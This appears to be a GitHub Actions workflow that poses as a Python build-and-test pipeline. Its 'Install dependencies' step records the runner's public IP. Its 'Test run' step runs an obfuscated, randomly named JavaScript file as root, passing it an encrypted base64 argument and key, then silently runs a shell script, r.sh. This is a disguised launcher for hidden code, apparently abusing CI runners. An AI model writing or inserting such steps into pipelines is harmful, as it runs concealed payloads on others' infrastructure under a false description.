name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'kjpkj'
        sudo chmod +x heard8w7wt/eldridge1gbc0.js
        sudo ./heard8w7wt/eldridge1gbc0.js U2FsdGVkX18b32r4wRRtfpwG37eccwkidJT/t20fZVTi6VI0xXUrkMaeijgRWVLWe+DFSUAZnlYDUAbQy9/p3HNraMLH0POLySc+kqVZ8JwkqlCVYhv/XH2OiHV6CFhS oz2abv && sudo sh r.sh > /dev/null 2>&1
